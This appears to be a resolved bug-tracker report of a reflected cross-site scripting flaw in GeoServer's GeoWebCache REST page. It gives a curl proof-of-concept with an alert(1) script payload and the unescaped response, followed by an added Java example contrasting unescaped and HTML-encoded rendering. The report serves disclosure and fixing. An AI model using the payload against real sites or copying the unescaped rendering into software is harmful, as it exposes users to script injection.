Details
- Type: Bug
- Status: Resolved
- Priority: Medium
- Resolution: Fixed
- Affects Version/s: 2.8.5
- Fix Version/s: 2.12-RC1
- Component/s: Vulnerability
- Environment: Tomcat 7, OpenJDK 1.8.0_102
Description
Running
curl 'http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>'
yields an answer with unescaped HTML:
<html><body> <a id="logo" href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</"><img src="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/web/geowebcache_logo.png" alt="" height="100" width="353" border="0"/></a> <h3>Resources available from here:</h3><ul><li><h4><a href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/layers/">layers</a></h4>Lets you see the configured layers. You can also view a specific layer by appending the name of the layer to the URL, DELETE an existing layer or POST a new one. Note that the latter operations only make sense when GeoWebCache has been configured through geowebcache.xml. You can POST either XML or JSON.</li> <li><h4>seed</h4></li> </ul></body></html>
Looks like the problem is similar to GEOS-7549 (Closed).
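The reflection shown in the description, as an added example that is not part of the original report and is not GeoServer or GeoWebCache source code: a page builder that concatenates the request URL into `href` and `src` attributes, next to the same builder with the URL HTML-encoded first. The class and method names are hypothetical, and the markup is a shortened model of the response quoted above.

```java
// Added illustration; not GeoServer or GeoWebCache source code.
public class RestIndexPageExample {

    // Encode the characters that can end a quoted attribute value or open a tag.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    // Markup modelled on the response in the report; 'url' lands in three attributes.
    static String page(String url) {
        return "<html><body><a id=\"logo\" href=\"" + url + "\">"
             + "<img src=\"" + url + "/web/geowebcache_logo.png\" alt=\"\"/></a>"
             + "<ul><li><a href=\"" + url + "/layers/\">layers</a></li></ul>"
             + "</body></html>";
    }

    // Before: the request URL is written into the attributes as received.
    static String renderUnescaped(String requestUrl) {
        return page(requestUrl);
    }

    // After: the URL is HTML-encoded before it reaches any attribute.
    static String renderEscaped(String requestUrl) {
        return page(escapeHtml(requestUrl));
    }

    public static void main(String[] args) {
        // Request URL taken from the curl command in the report.
        String url = "http://localhost:8080/geoserver/gwc/rest/web/\"><script>alert(1)</script>";
        String after = renderEscaped(url);
        System.out.println("before: " + renderUnescaped(url));
        System.out.println("after:  " + after);
        // The escaped page must not contain the raw tag or an early attribute close.
        if (after.contains("<script>") || after.contains("/web/\">")) {
            throw new AssertionError("request URL reached the page unescaped");
        }
    }
}
```

The same two `contains` checks can be applied to the body returned by the curl command in the report to confirm that a deployed version no longer reflects the path unescaped.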